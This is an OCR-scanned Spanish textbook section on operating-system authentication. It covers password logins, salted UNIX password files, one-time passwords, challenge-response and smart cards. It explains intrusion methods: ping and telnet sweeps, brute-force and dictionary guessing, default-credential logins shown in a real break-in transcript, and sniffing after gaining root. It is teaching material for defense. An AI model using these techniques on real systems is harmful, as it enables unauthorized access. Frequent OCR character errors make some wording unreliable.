Las primeras minicomputadoras (por ejemplo, PDP-1 y PDP-8) no tenían un procedimiento de 
inicio de sesión, pero con el esparcimiento de UNIX en la minicomputadora PDP-11, de nuevo era 
necesario tener uno. Las primeras computadoras personales (por ejemplo, Apple II y la IBM PC ori¬ 
ginal) no tenían un procedimiento de inicio de sesión, pero los sistemas operativos de computado¬ 
ra personal más sofisticados como Linux y Windows Vista sí lo tienen (aunque los usuarios 
imprudentes lo pueden deshabilitar). Las máquinas en las LANs corporativas casi siempre tienen 
configurado un procedimiento de inicio de sesión, de manera que los usuarios no lo puedan evitar. 
Por último, muchas personas hoy en día inician sesión (de manera indirecta) en computadoras re¬ 
motas para realizar operaciones bancarias por Internet, compras electrónicas, descargar música y 
otras actividades comerciales. Todas estas actividades requieren de un inicio de sesión autenticado, 
por lo que una vez más la autenticación de los usuarios es un tema importante. 
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Habiendo determinado que ia autenticación es a menudo importante, ei siguiente paso es en¬ 
contrar una buena manera de hacer que funcione. La mayoría de ios métodos para autenticar usua¬ 
rios cuando tratan de iniciar sesión se basan en uno de tres principios generaies, que a saber 
identifican 

1. Aigoqueei usuario conoce. 

2. Aigo que ei usuario tiene. 

3. Aigo que ei usuario es. 

Aigunas veces se requieren dos de estos principios para una seguridad adicionai. Estos principios 
producen distintos esquemas de autenticación con distintas compiejidadesy propiedades de seguri¬ 
dad. En ias siguientes secciones examinaremos cada uno de eiios en orden. 

Las personas que desean ocasionar probiemas en un sistema en particuiar primero tienen que 
iniciar sesión en ese sistema, para io cuai tienen que pasar por ei procedimiento de autenticación 
que se utiiice. En ia prensa popuiar, a estas personas se Íes conoce como hackers. Sin embargo, en 
ei mundo de ias computadoras ia paiabra "hacker" es un término honorario que se reserva para ios 
grandes programadores. Aunque aigunos de eiios son granujas, muchos no io son. La prensa se 
equivocó en este caso. Para diferenciar a ios verdaderos hackers, utiiizaremos ei término en ei sen¬ 
tido originai y a ias personas que tratan de irrumpir en ios sistemas computacionaies a ios que no 
pertenecen Íes i i amaremos crackers. Aigunas personas habían sobre ios hackers de sombrero 
blanco para referirse a ios tipos buenos, y sobre ios hackers de sombrero negro para referirse a 
ios tipos maios, pero con base en nuestra experiencia ia mayoría de ios hackers permanecen en ei 
interior todo ei tiempo y no utiiizan sombreros, así que no se Íes puede diferenciar por eiio. 

9.4.1 Autenticación mediante el uso de contraseñas 

La forma más utiiizada de autenticación es requerir que ei usuario escriba un nombre de inicio de 
sesión y una contraseña. La protección mediante contraseñas es fácii de comprender y de impie- 
mentar. La impiementación más simpie sóio mantiene una iista centrai de pares (nombre-inicio- 
sesión, contraseña). Ei nombre de inicio de sesión que se introduce se busca en ia iista y ia contra¬ 
seña introducida se compara con ia contraseña aimacenada. Si coinciden, se permite ai usuario que 
inicie sesión; en caso contrario, se rechaza. 

Tai vez no haya necesidad de decir que mientras se escribe una contraseña en ia computadora, 
ésta no debe mostrar ios caracteres escritos, para evitar que aiguien cercano ai monitor ios vea. En 
Windows, a medida que se escribe cada carácter aparece un asterisco. En UNIX no aparece ningún 
carácter a medida que se escribe i a contraseña. Estos esquemas tienen distintas propiedades. Ei es¬ 
quema de Windows puede servir para que ios usuarios distraídos vean fáciimente cuántos caracte¬ 
res han escrito en cierto momento, pero esto también divuiga ia iongitud de ia contraseña a ios 
fisgones. Desde ia perspectiva de seguridad, ei siiencio es oro. 

Otra área en ia que hay impiicaciones graves si no se reaiiza bien ei trabajo es ia que se mues¬ 
tra en ia figura 9-17. En ia figura 9-17(a) se muestra un inicio de sesión exitoso, con ia saiida dei 


SECCION 9.4 


AUTENTICACION 


643 


sistema en mayúsculas y la entrada del usuario en minúsculas. En la figura 9-17(b) se muestra un 
intento fallido de un cracker por iniciar sesión en el Sistema A. En la figura 9-17(c) se muestra 
un intento fallido de un cracker por iniciar sesión en el Sistema B. 


USUARIO: mitch 
CONTRASEÑA: FooBar!-7 
INICIO DE SESION EXITOSO 

(a) 


USUARIO: carol 

NOMBRE DE USUARIO INVALIDO 
USUARIO: 

(b) 


USUARIO: carol 
CONTRASEÑA: yonose 
INICIO DE SESION INVALIDO 
USUARIO: 

(O 


Figura 9-17. (a) U n inicio de sesión exitoso, (b) Se rechaza el inicio de sesión después 
de introducir un nombre, (c) Se rechaza el inicio de sesión después de escribir el nom¬ 
bre y la contraseña. 

En la figura 9-17(b), el sistema se queja tan pronto como ve un nombre de inicio de sesión in¬ 
válido. Esto es un error, ya que permite al cracker seguír probando nombres de inicio de sesión has¬ 
ta que encuentra uno válido. En la figura 9-17(c), al cracker siempre se le pide una contraseña y no 
recibe ninguna pista sobre si el nombre de inicio de sesión es válido o no. Todo lo que aprende es 
que la combinación entre el nombre de inicio de sesión y la contraseña es incorrecta. 

Como observación adicional sobre el inicio de sesión, la mayoría de las computadoras note- 
book se configuran para requerir un nombre de usuario y una contraseña, de manera que su conte¬ 
nido esté protegido en caso de que se pierdan o sean robadas. A unque eso es mejor que nada, no es 
mucho mejor que nada. Cualquiera que se apodere de la notebook puede iniciarla y de inmediato ir 
al programa de configuración del BIOS, oprimiendo SUPR, F8 o alguna otra tecla específica para 
el BIOS (que por lo general aparece en la pantalla) antes de que se inicie el sistema operativo. Una 
vez ahí, puede modificar la secuencia de arranque para que la computadora arranque desde una me¬ 
moria USB antes de intentar con el disco duro. Después, el saboteador inserta una memoria USB 
que contenga un sistema operativo completo y arranca la computadora desde ahí. Una vez en eje¬ 
cución el disco duro se puede montar (en UNIX) o utilizar como la unidad D: (Windows). Para evi¬ 
tar esta situación, la mayoría de los BIOS permiten que el usuario proteja el programa de 
configuración con contraseña, de manera que sólo el propietario pueda cambiar la secuencia 
de arranque. Si usted tiene una computadora notebook, deje de leer en este momento. Vaya y pon¬ 
ga una contraseña en su BIOS, y después regrese. 


Cómo entran a la fuerza los crackers 

Para entrar a la fuerza, la mayoría de los crackers se conectan a la computadora destino (por ejem¬ 
plo, a través de Internet) y prueban muchas combinaciones (nombre de usuario, contraseña) hasta 
que encuentran una que funciona. M uchas personas utilizan su nombre en una forma u otra como 
su nombre de inicio de sesión. Para Ellen Ann Smith, algunos candidatos razonables podrían ser 
ellen, smith, ellen_smith, ellen-smith, ellen.smith, emith, easmith y eas. Con uno de esos libros ti- 
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tulado 4096 nombres para su nuevo bebé más una agenda telefónica llena de apellidos, un cracker 
puede compilar con facilidad una lista computarizada de nombres de inicio potenciales apropiados 
para el país que va a atacar (ellen_smith podría funcionar bien en los Estados Unidos o en Inglate¬ 
rra, pero tal vez no en J apón). 

Desde luego que no basta con adivinar el nombre de inicio de sesión. También hay que adivinar 
la contraseña. ¿Qué tan difícil es eso? Más fácil de lo que podría creer. M orris y Thompson (1979) 
realizaron un trabajo clásico sobre la seguridad de las contraseñas en sistemas UNIX. Compilaron 
una lista de contraseñas probables: nombresy apellidos, nombres de cal les, nombres de ciudades, pa¬ 
labras de un diccionario de tamaño moderado (también palabras deletreadas a la inversa), números 
de placas de automóviles y cadenas cortas de caracteres aleatorios. Después compararon su lista con 
el archivo de contraseñas del sistema para ver si había coincidencias. Cerca de 86% de las contrase¬ 
ñas aparecieron en su lista. Klein (1990) obtuvo un resultado similar. 

A no ser que alguien piense que los usuarios de mejor calidad eligen contraseñas de mejor ca¬ 
lidad, tenga la seguridad de que no es así. En 1997, una encuesta sobre las contraseñas utilizadas en 
el distrito financiero de Londres reveló que el 82% de ellas se podían adivinar con facilidad. Las 
contraseñas de uso común eran términos sexuales, expresiones abusivas, nombres de personas (a 
menudo un miembro familiar o un deportista famoso), destinos para vacacionar y objetos comunes 
de oficina (Kabay, 1997). Así, un cracker puede compilar una lista de nombres potenciales de ini¬ 
cio de sesión y una lista de contraseñas potenciales sin mucho trabajo. 

El crecimiento deWeb ha empeorado todavía más el problema. En vez detener sólo una con¬ 
traseña, muchas personas ahora tienen una docena o más. Como es muy difícil recordarlas todas, 
tienden a elegir contraseñas simples y débiles, y las reutilizan en muchos sitios Web (Florencio y 
Flerley, 2007; Gaw y Felten, 2006). 

¿Realmente importa si las contraseñas son fáciles de adivinar? Definitivamente. En 1998, el pe¬ 
riódico San j ose M ercury News reportó que un residente de Berkeley llamado Peter Shipley había 
configurado varias computadoras sin uso como "war dialers", que marcaban los 10,000 números 
telefónicos que pertenecían a una central telefónica [por ejemplo, (415) 770-xxxx], por lo general 
en orden aleatorio para frustrar a las compañías telefónicas que reprueban dicho uso y traten de de¬ 
tectarlo. Después de realizar 2.6 millones de llamadas, localizó 20,000 computadoras en el área de 
la bahía, 200 de las cuales no tenían ningún tipo de seguridad. Peter estimó que un cracker deter¬ 
minado podría irrumpir en casi 75% de las otras computadoras (Denning, 1999). Y esto fue en la 
época del "Periodo jurásico", en donde la computadora tenía que marcar los 2.6 millones de núme¬ 
ros telefónicos. 

No sólo hay crackers en California. Un cracker australiano trató de hacer lo mismo. Entre los 
muchos sistemas en los que irrumpió había una computadora deCitibank en Arabia Saudita, que le 
permitió obtener números de tarjetas de crédito y límites de crédito (en un caso, $5 millones) y re¬ 
gistros de transacciones (incluyendo al menos una visita a un burdel). Uno de sus crackers colegas 
también irrumpió en el banco y recolectó 4000 números de tarjetas de crédito (Denning, 1999). Si 
se utilizara dicha información con malicia, el banco sin duda negaría con énfasis y vigor que pudie¬ 
ra tener una falla, y afirmaría que el cliente debió haber divulgado la información. 

Para los crackers. Internet es un regalo de Dios, ya que elimina todos los aspectos tediosos de 
su trabajo. Ya no hay necesidad de marcar números telefónicos. El "war dialing" ahora funciona 
de la siguiente manera. Cada computadora en Internet tiene una dirección IP (de 32 bits) que se 
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utiliza para identificarla. Por lo general, las personas escriben estas direcciones en notación deci¬ 
mal con puntos como w.x.y.z, en donde cada uno de los cuatro componentes de la dirección IP es 
un entero deO a 255 en decimal. Un cracker puede probar con facilidad si alguna computadora tie¬ 
ne esta dirección IP y está funcionando, mediante el siguiente comando: 

ping w.x.y.z 

en el shell o símbolo del sistema. Si la computadora está viva, responderá y el programa ping indi¬ 
cará cuánto tiempo duró el viaje redondo en milisegundos (aunque algunos sitios ahora deshabili¬ 
tan el comando ping para evitar este tipo de ataque). Es fácil escribir un programa para hacer ping 
con grandes números de direcciones IP de manera sistemática, algo parecido a lo que hacía el war 
dialer. Si se encuentra una computadora encendida en w.x.y.z, el cracker puede tratar de entrar me¬ 
diante el comando: 

teinet w.x.y.z 

Si se acepta el intento de conexión (que es muy poco probable, ya que no todos los administrado¬ 
res de sistemas desean inicios de sesión aleatorios a través de Internet), el cracker puede empezar a 
probar nombres de inicio de sesión y contraseñas de sus listas. Al principio es un proceso de prue¬ 
ba y error. Sin embargo, tal vez el cracker pueda irrumpir unas cuantas veces y capturar el archivo 
de contraseñas (que se ubica en /etc/passwd en los sistemas UNIX, y a menudo tiene permiso pú¬ 
blico de lectura). Después empezará a recolectar información estadística sobre las frecuencias de 
uso de los nombres de inicio de sesión para optimizar las búsquedas en el futuro. 

M uchos demonios de teinet interrumpen la conexión TCP subyacente después de intentar sin 
éxito varios i nidos de sesión, en un intento por detener a los crackers. Éstos responden iniciando mu¬ 
chos hilos en paralelo, trabajando en diferentes máquinas a la vez. Su objetivo es realizar todos los 
intentos por segundo que permita el ancho de banda de salida. Desde su punto de vista, no es mucha 
desventaja tener que dividir el esfuerzo entre muchas máquinas que se atacan al mismo tiempo. 

En vez de hacer ping en las máquinas en un orden por dirección IP, un cracker se podría enfo¬ 
car en una empresa, universidad u organización gubernamental específica: por ejemplo, la U niver- 
sidad deFoobaren foobar.edu. Para averiguar qué direcciones IP utiliza, todo lo que tiene que hacer 
es escribir 

dnsquery foobar.edu 

y obtendrá una lista de algunas de sus direcciones IP. De manera alternativa se pueden utilizar los 
programas nslookup o dig (otra de las posibilidades es escribir "consulta DNS" en cualquier motor 
de búsqueda para encontrar un sitio Web que realice búsquedas DNS gratuitas: por ejemplo, 
www.dnsstuff.com). Como muchas organizaciones tienen 65,536 direcciones IP consecutivas (una 
unidad de asignación común en el pasado), una vez que averigüe los primeros 2 bytes de sus direc¬ 
ciones IP (quednsquery proporciona), es muy sencillo hacer ping en las 65,536 direcciones para ver 
cuáles responden y cuáles aceptan conexiones teinet. De ahí en adelante, hay que volver a adivinar 
nombres de inicio de sesión y contraseñas, un tema que ya vimos. 

Sin necesidad de decirlo, todo el proceso de empezar con un nombre de dominio, buscar los 
primeros 2 bytes de sus direcciones IP, hacer ping en todas esas direcciones para ver cuáles están 
activas, comprobar si alguna acepta conexiones teinet y después tratar de adivinar pares (nombre de 
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inicio de sesión, contraseña) con iguai probabiiidad estadística es un proceso que se presta muy bien 
a ia automatización. Se requerirán muchos, pero muchos intentos para irrumpir, pero si hay aigo que 
ias computadoras hacen bien, es repetir ia misma secuencia de comandos una y otra vez hasta io- 
grar su objetivo. U n cracker con un cabie de aita veiocidad o una conexión DSL puede programar 
ei proceso de irrumpir en ias computadoras para que se ejecute todo ei día, y sóio necesita revisar- 
io de vez en cuando para ver si hay resuitados. 

Además dei servicio teinet, muchas computadoras tienen una variedad de servicios disponibies 
por Internet. Cada uno de estos servicios está conectado a uno de ios 65,536 puertos asociados con 
cada dirección IP. Cuando un cracker encuentra una dirección IP activa, con frecuencia ejecuta una 
exploración de puertos para ver qué hay disponibie. Aigunos de ios puertos pueden producir op¬ 
ciones adicionaies para irrumpir en ei sistema. 

Un ataque por teinet o por expioración de puertos es mucho mejor que un ataque mediante un 
war diaier, ya que es mucho más rápido (no se pierde tiempo en marcar ios números teiefónicos) y 
económico (no hay cargos teiefónicos de iarga distancia), pero sóio funciona en máquinas que es¬ 
tán en I nternet y aceptan conexiones teinet. Sin embargo, muchas empresas (y casi todas ias univer¬ 
sidades) aceptan conexiones de teinet para que ios empieados en un viaje de negocios o en una 
sucursai diferente (o ios estudiantes en su hogar) puedan iniciar una sesión remota. 

Con frecuencia, ias contraseñas de ios usuarios no sóio son débiies, sino que aigunas veces ia 
contraseña dei usuario raíz también io es. En especiai, ciertas instaiaciones nunca se moiestan en 
cambiar ias contraseñas predeterminadas con ias que saie ei sistema de fábrica. Ciiff Stoii, un as¬ 
trónomo en Berkeiey, había observado irreguiaridades en su sistema y preparó una trampa para ei 
cracker que había estado tratando de entrar (Stoii, 1989). Observó ia sesión que se muestra en ia fi¬ 
gura 9-18, escrita por un cracker que ya había irrumpido en una máquina en ei Lawrence Berkeiey 
Laboratory (LBL) y estaba tratando de entrar en otra. La cuenta uucp (Programa de copia de UN IX 
a UNIX) se utiliza para el tráfico de red entre máquinas y tiene poder de superusuario, por lo que 
el cracker se encontraba ahora en una máquina del Departamento de Energía de los EE.UU. como 
superusuario. Por fortuna, el LBL no diseña armas nucleares, aunque su laboratorio hermano en Li- 
vermore sí. Esperamos que su seguridad sea mejor, pero hay muy pocas razones para creer eso, ya 
que otro laboratorio de armas nucleares (Los Alamos) perdió un disco duro lleno de información 
clasificada en el 2000. 

LBL> teinet elxsi 
ELXSI AT LBL 
LOGIN: root 
PASSWORD: root 

INCORRECT PASSWORD, TRY AGAIN 
LOGIN: guest 
PASSWORD: guest 

INCORRECT PASSWORD, TRY AGAIN 
LOGIN: UUCP 
PASSWORD: uucp 

WELCOME TO THE ELXSI COMPUTER AT LBL 

Figura 9-18. Cómo entró un cracker en una computadora del Departamento de Ener¬ 
gía de los EE.UU. en el LBL. 
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Una vez que un cracker entra en un sistema y se convierte en superusuario, puede ser posibie 
instaiar un husmeador de paquetes, un software que examina todos ios paquetes entrantes y sa- 
i i entes de i a red, en busca de ciertos patrones. U n patrón muy interesante a buscar es ei de i as per¬ 
sonas en ia máquina comprometida que inician sesión en máquinas remotas, en especiai como 
superusuarios. Esta información se puede esconder en un archivo para queei cracker io iea después, 
cuando io desee. De esta manera, un cracker que irrumpe en una máquina con una seguridad débii 
se puede aprovechar de esto para irrumpir en otras máquinas con una seguridad más sóiida. 

Cada vez hay más usuarios sin conocimientos de computación que irrumpen en sistemas con 
sóio ejecutar secuencias de comandos que encuentran en Internet. Estas secuencias de comandos 
utiiizan ataques de fuerza bruta dei tipo antes descrito, o tratan de expiotar errores conocidos en pro¬ 
gramas específicos. Los verdaderos hackers se refieren con desprecio a eiios como niños script 
(script kiddies). 

Por io generai, ei niño script no tiene un objetivo específico ni información específica que trate 
de robar. Sóio busca máqui ñas en ias que sea fáci i entrar. A igunas de ias secuencias de comandos i n- 
ciuso seieccionan una red ai azar para atacada, mediante ei uso de un número de red aieatorio (en 
ia parte superior de ias direcciones IP). Después sondean todas ias máquinas en ia red para ver cuá- 
ies responden. Una vez que se adquiere una base de datos de direcciones IP válidas, se ataca a cada 
máquina por separado. Como consecuencia de esta metodología, puede darse la probabilidad deque 
se realice un ataque en una máquina nueva en una instalación militar segura, horas después de ha¬ 
berla conectado a Internet, aun cuando nadie excepto el administrador sepa que la máquina está fun¬ 
cionando. 

Seguridad de contraseñas de UNIX 

Algunos sistemas operativos (antiguos) mantienen el archivo de contraseñas en el disco en un for¬ 
mato no cifrado, pero protegido mediante los mecanismos usuales de protección del sistema. Es 
muy peligroso tener todas las contraseñas en un archivo en el disco y en un formato no cifrado, ya 
que muchas personas tienen acceso a este archivo, y con mucha frecuencia. Entre estas personas 
puede haber administradores del sistema, operadores de las máquinas, personal de mantenimiento, 
programadores, la gerencia y tal vez hasta algunas secretarias. 

Hay una mejor solución en UNIX, que se utiliza de la siguiente manera. El programa de inicio 
de sesión pide al usuario que escriba su nombre y su contraseña. La contraseña se "cifra" de inme¬ 
diato al utilizarla como una clave para cifrar un bloque fijo de datos. En efecto, se ejecuta una fun¬ 
ción de una vía, con la contraseña como entrada y una función de la contraseña como salida. En 
realidad este proceso no es cifrado, pero es mucho más fácil considerarlo así. Después, el progra¬ 
ma de inicio de sesión lee el archivo de contraseñas, que es sólo una serie de líneas ASCII, una por 
cada usuario, hasta que encuentra la línea que contiene el nombre de inicio de sesión del usuario. 
Si la contraseña (cifrada) que contiene esta línea coincide con la contraseña cifrada que se acaba de 
calcular se permite el inicio de sesión, y en caso contrario se rechaza. La ventaja de este esquema 
es que nadie, ni siquiera el superusuario, puede ver las contraseñas de los usuarios debido a que no 
se almacenan en formato descifrado en ninguna parte del sistema. 

Sin embargo, este esquema también se puede atacar, como se muestra a continuación. Prime¬ 
ro, el cracker crea un diccionario de palabras probables de la manera en que lo hicieron M orris y 
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Thompson. Estas contraseñas se cifran mediante el algoritmo conocido, a gusto del cracker. No im¬ 
porta cuánto tiempo tarde este proceso, ya que se realiza antes del intento de entrar en el sistema. 
Ahora que está armado con una lista de pares (contraseña, contraseña cifrada), el cracker ataca. Lee 
el archivo de contraseñas (que tiene acceso público) y extrae todas las contraseñas cifradas. Luego 
las compara con las contraseñas cifradas de su lista. Por cada coincidencia, ahora se sabe el nom¬ 
bre de inicio de sesión y la contraseña descifrada. U na secuencia de comandos de shell simple pue¬ 
de automatizar este proceso, de manera que se pueda llevar a cabo en una fracción de un segundo. 
Una ejecución típica de la secuencia de comandos producirá docenas de contraseñas. 

Al reconocer la posibilidad de este ataque, M orris y Thompson describieron una técnica que 
inutiliza el ataque casi por completo. Su idea es asociar a cada contraseña un número aleatorio de 
n bits, conocido como salt. El número aleatorio se modifica cada vez que se cambia la contraseña. 
El número aleatorio se almacena en el archivo de contraseñas en formato descifrado, para que to¬ 
dos puedan leerlo. En vez de almacenar sólo la contraseña cifrada en el archivo de contraseñas, pri¬ 
mero se concatenan la contraseña y el número aleatorio y después se cifran juntos. Este resultado 
cifrado se almacena en el archivo de contraseña, como se muestra en la figura 9-19 para un archi¬ 
vo de contraseñas con cinco usuarios: Robbie, Tony, Laura, Mark y Deborah. Cada usuario tiene 
una línea en el archivo, con tres entradas separadas por comas: nombre de inicio de sesión, salt y 
contraseña cifrada -i- salt. La notación e(Perro, 4238) representa el resultado de concatenar la con¬ 
traseña de Bobbie (Perro) con su salt asignado al azar (4238), y después ejecutarlo a través de la 
función de cifrado, e. El resultado de ese cifrado se almacena como el tercer campo de la entrada 
de Bobbie. 


Bobbie, 4238, e(Perro, 4238) 

Tony, 2918, e{6%%TaeFF, 2918) 
Laura, 6902, e(Shakespeare, 6902) 
Mark, 1694, e(XaB#Bwcz, 1694) 
Deborah, 1092, e{LordByron, 1092) 


Figura 9-19. El uso de un salt para evitar que las contraseñas cifradas se calculen con 
anticipación. 

A hora considere las implicaciones para un cracker que desea crear una lista de contraseñas pro¬ 
bables, cifrarlas y guardar los resultados en un archivo ordenado f, de manera que se pueda buscar 
con facilidad cualquier contraseña cifrada. Si un intruso sospecha que Perro podría ser una contra¬ 
seña, ya no basta con sólo cifrar Perro y colocar el resultado en f. Tiene que cifrar 2" cadenas, co¬ 
mo PerroOOOO, PerroOOOl, Perro0002 y así en lo sucesivo, e introducirlas todas en f. Esta técnica 
incrementa el tamaño def por 2T UNIX utiliza este método con n = 12. 

Para obtener una seguridad adicional, algunas versiones modernas de UNIX hacen que el ar¬ 
chivo de contraseñas sea ilegible, pero proporcionan un programa para buscar entradas en base a la 
petición, y agregan el suficiente retraso como para atrasar de manera considerable a cualquier ata¬ 
cante. En general, la combinación de usar un número salt con el archivo de contraseñas y hacerlo 
ilegible, excepto de manera indirecta (y lento), puede soportar la mayoría de los ataques. 
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Contraseñas de un solo uso 

La mayoría de los superusuarios exhortan a sus usuarios mortales para que cambien sus contrase¬ 
ñas una vez al mes. La mayoría de los usuarios hacen caso omiso. Lo más extremoso es cambiar la 
contraseña en cada inicio de sesión; a estas contraseñas se les conoce como contraseñas de un so¬ 
lo uso. Cuando se utilizan contraseñas de una sola vez, el usuario recibe un libro que contiene una 
lista de contraseñas. En cada inicio de sesión se utiliza la siguiente contraseña en la lista. Si un in¬ 
truso llega a descubrir una contraseña no le servirá de nada, ya que la próxima vez se debe utilizar 
una contraseña distinta. Se le sugiere al usuario que trate de no perder el libro de contraseñas. 

En la actualidad no se necesita un libro debido a un elegante esquema ideado por Leslie Lam¬ 
port, el cual permite a un usuario iniciar sesión en forma segura a través de una red insegura, me¬ 
diante contraseñas de un solo uso (Lamport, 1981). El método de Lamport se puede utilizar para 
permitir que un usuario en una PC doméstica inicie sesión en un servidor a través de Internet, aun 
cuando los intrusos puedan ver y copiar todo el tráfico en ambas direcciones. Además no hay que 
almacenar secretos en el sistema de archivos del servidor ni en el de la PC del usuario. A este mé¬ 
todo se le conoce algunas veces como cadena de hash de una vía. 

El algoritmo se basa en una función de una vía; es decir, una función y = f(x) que tiene la pro¬ 
piedad de que dada x es fácil encontrar a y, pero dada y es imposible calcular el valor de x. La en¬ 
trada y la salida deben tener la misma longitud: por ejemplo, de 256 bits. 

El usuario selecciona una contraseña secreta que luego memoriza. También selecciona un en¬ 
tero n, el cual representa cuántas contraseñas de un solo uso puede generar el algoritmo. Como 
ejemplo, considere que n = 4, aunque en la práctica se utilizaría un valor más grande para n. Si la 
contraseña secreta es s, la primera contraseña se obtiene al ejecutar la función de una vía n veces: 

Pi = f(f(f(f (s)))) 

La segunda contraseña se obtiene al ejecutar la función de una vía n - 1 veces: 

P 2 = f(f(f (s))) 

Para la tercera contraseña se ejecuta f dos veces, y para la cuarta se ejecuta una vez. En general, 
P¡_i = f(P¡)- La clave a observar aquí es que dada cualquier contraseña en la secuencia, es fácil 
calcularla anterior en la secuencia numérica, pero imposible calcular la siguiente. Por ejemplo, da¬ 
da Pj es fácil encontrar P;^, pero imposible encontrar P 3 . 

El servidor se inicializa con Pg, que es sólo ffP^). Este valor se almacena en la entrada del ar¬ 
chivo de contraseñas que está asociada con el nombre de inicio de sesión del usuario, junto con el 
entero 1, lo cual indica que la siguiente contraseña requerida es P^. Cuando el usuario desea iniciar 
sesión por primera vez, envía su nombre de inicio de sesión al servidor y éste le responde envian¬ 
do el entero en el archivo de contraseñas: es decir, 1. La máquina del usuario responde con P^, que 
se puede calcular en forma local a partir de s, y se escribe al instante. Después el servidor calcula 
ffP^) y compara su resultado con el valor almacenado en el archivo de contraseñas (Pg). Si los va¬ 
lores coinciden se permite el inicio de sesión, el entero se incrementa a 2 y P^ sobrescribe a Pg en 
el archivo de contraseñas. 
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En el siguiente inicio de sesión, ei servidor envía ai usuario un 2 y ia máquina de éste caicuia 
Pj. Después ei servidor caicuia fíPj) y compara ei resuitadocon ia entrada en ei archivo de contra¬ 
señas. Si ios vaiores coinciden se permite ei inicio de sesión, ei entero se incrementa a 3 y Pj so¬ 
brescribe a P;^ en ei archivo de contraseñas. La propiedad que hace funcionar este esquema es que, 
inciuso si un intruso puede iiegar a capturar P¡, no tiene forma de caicuiar P¡^^ a partir de P¡, sóio 
puede caicuiar P¡_^ pero este vaiorya se utiiizó y ahora no tiene vaior. Cuando se han utiiizado to¬ 
das ias n contraseñas, ei servidor se reiniciaiiza con una nueva ciave secreta. 


Autenticación de reto-respuesta 

U na variación en ia idea de ias contraseñas es hacer que cada nuevo usuario proporcione una iarga 
iista de preguntas y respuestas que posteriormente se aimacenan en ei servidor en forma segura (por 
ejempio, en formato cifrado). Las preguntas se deben eiegir de tai forma que ei usuario no tenga 
que anotarias. Las preguntas posibies son: 

1. ¿Quién es ia hermana de M arjoiein? 

2. ¿En qué caiie se encontraba su escuda primaria? 

3. ¿Qué enseñaba ia Sra. Woroboff? 

Ai momento de iniciar sesión, ei servidor hace una de estas preguntas ai azar y comprueba i a res¬ 
puesta. No obstante, para que este esquema sea práctico se necesitan muchos pares de pregunta- 
respuesta. 

La autenticación reto-respuesta es otra variación. Cuando se utiiiza, ei usuario eiige un aigo- 
ritmo ai registrarse como usuario, como por ejempio. Cuando ei usuario inicia sesión, ei servi¬ 
dor ie envía un argumento: por ejempio, un 7, en cuyo caso ei usuario escribe 49. Ei aigoritmo 
puede ser distinto en ia mañana y en ia tarde, en distintos días de ia semana, y así en io sucesivo. 

Si ei dispositivo dei usuario tiene verdadero poder de cómputo, como una computadora perso- 
nai, un asistente digitai personai o un teiéfono ceiuiar, se puede utiiizar una forma más poderosa de 
reto-respuesta. Ei usuario seiecciona por adeiantado una ciave secreta k, ia cuai en un principio se 
iieva ai sistema servidor en forma manuai. También se mantiene una copia (en forma segura) en ia 
computadora dei usuario. Ai momento de iniciar sesión, ei servidor envía un número aieatorio r a 
ia computadora dei usuario, que a su vez caicuia f(r,k) y envía ei resuitado de vueita, en donde f es 
una función conocida púbiicamente. Después ei servidor reaiiza ei cáicuio y comprueba si ei resui¬ 
tado que recibió de ia computadora dei usuario coincide con ei resuitado de su cáicuio. La ventaja 
de este esquema en comparación con una contraseña es que, inciuso si una persona que interviene 
ios cabies de red ve y registra todo ei tráfico en ambas direcciones, no aprenderá nada que ie ayu¬ 
de ia próxima vez. Desde iuego que ia función f tiene que serio bastante compiicada como para que 
no se pueda deducir ei vaior de k, aun si se tiene un conjunto extenso de observaciones. Las funcio¬ 
nes de hash criptográficas son buenas opciones, en donde ei argumento es ia función XQR de r y 
k. Se sabe que es difícii invertir estas funciones. 
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9.4.2 Autenticación mediante el uso de un objeto físico 

El segundo método para autenticar a los usuarios es comprobar algún objeto físico que tengan, en 
vez de algo que sepan. Para este fin se han utilizado las llaves de puertas metálicas durante siglos. 
Hoy en día, el objeto físico que se utiliza con frecuencia es una tarjeta de plástico que se inserta en 
un lector asociado con la computadora. Por lo general, el usuario no sólo debe insertar la tarjeta, si¬ 
no que también debe escribir una contraseña para evitar que alguien utilice una tarjeta perdida o ro¬ 
bada. Visto de esta forma, el uso de un ATM (Cajero automático) bancario empieza cuando el 
usuario inicia sesión en la computadora del banco a través de una terminal remota (la máquina 
ATM ) mediante el uso de una tarjeta de plástico y una contraseña (en la actualidad es un código NIP 
de 4 dígitos en la mayoría de los países, pero esto sólo es para evitar el costo de tener que colocar 
un teclado completo en la máquina ATM ). 

Las tarjetas de plástico que contienen información vienen en dos variedades: tarjetas de tira 
magnética y tarjetas de chip. Las tarjetas de tira magnética contienen aproximadamente 140 bytes 
de información escrita en una pieza de cinta magnética pegada en la parte posterior de la tarjeta. 
Una terminal puede leer esta información y enviarla a la computadora central. A menudo la infor¬ 
mación contiene la contraseña del usuario (por ejemplo, el código NIP) para que la terminal pueda 
realizar una comprobación de identidad, incluso aunque el enlace con la computadora principal es¬ 
té desconectado. Por lo general, la contraseña se cifra mediante una clave que sólo el banco cono¬ 
ce. Estas tarjetas cuestan entre $0.10 y $0.50, dependiendo si tienen una calcomanía holográfica en 
la parte frontal y del volumen de producción. Como una manera de identificar a los usuarios en ge¬ 
neral, las tarjetas de tira magnética son riesgosas debido a que el equipo para leerlas y escribir en 
ellas es económico y está disponible en muchas partes. 

Las tarjetas de chip contienen un pequeño circuito integrado (chip). Estas tarjetas se pueden 
subdividir en dos categorías: tarjetas de valor almacenado y tarjetas inteligentes. Las tarjetas de 
valor almacenado contienen una pequeña cantidad de memoria (por lo general menos de 1 KB), 
en la que se utiliza la tecnología ROM para permitir que el valerse recuerde cuando se quite la tar¬ 
jeta del lector y, por ende, se desconecte la energía. No hay CPU en la tarjeta, por lo que el valor 
almacenado se debe modificar mediante una CPU externa (en el lector). Estas tarjetas se producen 
en masa por millones, su costo está por debajo de $1 y se utilizan, por ejemplo, como tarjetas tele¬ 
fónicas prepagadas. Cuando se hace una llamada, el teléfono sólo reduce el valor en la tarjeta, pe¬ 
ro en realidad no hay intercambio de dinero. Por esta razón, comúnmente una empresa emite estas 
tarjetas para utilizarlas sólo en sus máquinas (por ejemplo, los teléfonos o las máquinas expende¬ 
doras). Se podrían utilizar para autenticar inicios de sesión, almacenando en ellas una contraseña de 
1 KB que el lector enviaría a la computadora central, pero esto se hace raras veces. 

No obstante, en la actualidad una gran parte del trabajo sóbrela seguridad se enfoca en las tar¬ 
jetas inteligentes, cuya configuración actual es algo así como una CPU de 8 bits y 4 M Hz, 16 KB 
de ROM , 4 K B de ROM , 512 bytes de RAM reutilizable y un canal de comunicación de 9600 bps 
